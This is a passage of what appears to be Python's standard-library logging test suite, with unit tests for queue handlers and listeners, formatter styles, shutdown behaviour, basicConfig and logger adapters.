self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
        # Test that the traceback is only appended once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
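# Illustrative sketch (not part of the test suite): the producer/consumer
# split the tests above exercise.  QueueHandler only enqueues records, and a
# QueueListener thread dequeues them and fans them out to the real handlers.
def _queue_logging_sketch():
    import io, queue
    stream = io.StringIO()
    q = queue.Queue(-1)
    producer = logging.getLogger('queue.sketch')
    producer.propagate = False
    producer.addHandler(logging.handlers.QueueHandler(q))
    listener = logging.handlers.QueueListener(q, logging.StreamHandler(stream))
    listener.start()
    producer.warning('routed through the queue')
    listener.stop()  # processes everything already queued, then returns
    return stream.getvalue()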
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
                self.setup_and_log(queue, '%s_%s' % (self.id(), i))
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
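# Illustrative sketch (not part of the test suite): the same record rendered
# with the three format styles FormatterTest checks -- '%', '{' and '$'.
def _format_styles_sketch():
    record = logging.makeLogRecord({'msg': 'hello', 'levelname': 'INFO'})
    percent = logging.Formatter('%(levelname)s %(message)s')
    braces = logging.Formatter('{levelname} {message}', style='{')
    dollars = logging.Formatter('$levelname $message', style='$')
    return [f.format(record) for f in (percent, braces, dollars)]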
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
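# Sketch of the mechanism tested above: when a record propagates to the
# top of a handler-less logger tree, logging falls back to
# logging.lastResort, a stderr handler fixed at WARNING level, so warnings
# and above still appear while DEBUG/INFO records are dropped silently.
def _demo_last_resort():
    orphan = logging.Logger('orphan')  # standalone logger with no handlers
    orphan.warning('reaches stderr via logging.lastResort')
    orphan.debug('below WARNING: silently dropped')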
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
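# Sketch of the contract exercised above (assuming the root logger starts
# unconfigured): basicConfig() only configures the root logger when it has
# no handlers yet, so a second call is a silent no-op (3.8+ adds
# force=True to override this).
def _demo_basic_config_once():
    logging.basicConfig(level=logging.INFO)
    logging.basicConfig(level=logging.DEBUG)  # ignored: root already configured
    assert logging.root.level == logging.INFO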
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
